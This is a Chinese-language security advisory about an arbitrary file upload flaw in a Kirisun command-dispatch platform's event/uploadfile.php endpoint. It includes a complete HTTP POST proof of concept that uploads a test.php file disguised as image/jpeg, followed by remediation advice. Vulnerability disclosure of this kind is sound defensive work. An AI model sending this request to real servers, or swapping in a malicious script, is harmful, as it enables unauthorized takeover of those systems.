漏洞预警 | 福建科立讯指挥调度管理平台任意文件上传漏洞

浅安 浅安安全 2024-08-17 08:00

0x00 漏洞编号
– # 暂无

0x01 危险等级
– 高危

0x02 漏洞概述

科立讯指挥调度管理平台是一个专业针对通信行业的管理平台。

0x03 漏洞详情

漏洞类型：
任意
文件
上传

影响：
接管服务器

简述：
科立讯指挥调度管理平台的event/uploadfile.php接口存在任意文件上传漏洞，攻击者可通过该漏洞上传恶意脚本，进而接管服务器。

0x04 影响版本
– 科立讯指挥调度管理平台

0x05POC

POST /api/client/event/uploadfile.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----xxxxxxxx

------xxxxxxxx
Content-Disposition: form-data; name="uploadfile"; filename="test.php"
Content-Type: image/jpeg

hahaha,this is event uploadfile.
------xxxxxxxx--

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者
不承担任何法律及连带责任。

0x06修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.kirisun.com.cn/